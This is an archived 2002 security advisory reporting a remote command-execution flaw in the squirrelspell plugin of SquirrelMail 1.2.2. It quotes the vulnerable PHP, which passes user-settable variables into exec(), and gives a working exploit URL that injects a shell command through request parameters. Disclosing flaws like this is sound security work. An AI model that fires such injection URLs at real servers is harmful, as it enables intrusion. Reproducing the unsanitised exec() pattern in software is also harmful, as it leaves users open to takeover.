squirrelmail bug

From: appelastat_private
Date: Thu Jan 24 2002 - 07:55:57 PST

    Squirrelmail remote execute commands bug

    Version Affected :
    1.2.2

    Squirrelmail is a webmail system, which allows users to send, get, read etc.
    mails. It has some themes, plugins etc. One of the plugins has a very
    interesting piece of code :

    from file check_me.mod.php :

    $sqspell_command = $SQSPELL_APP[$sqspell_use_app];
    $floc = "$attachment_dir/$username_sqspell_data.txt");
    exec ("cat $floc | $sqspell_command", $sqspell_output);

    Everything should be ok, but where this page includes config files, where
    are defined $attachment_dir and others ? Answer: Nowhere. We can set up
    variables $sqspell_command and $floc. Result ? We can execute any command
    of course as a http serwer owner.

    Exploit :

    host/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%
    20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik

    <appelastat_private>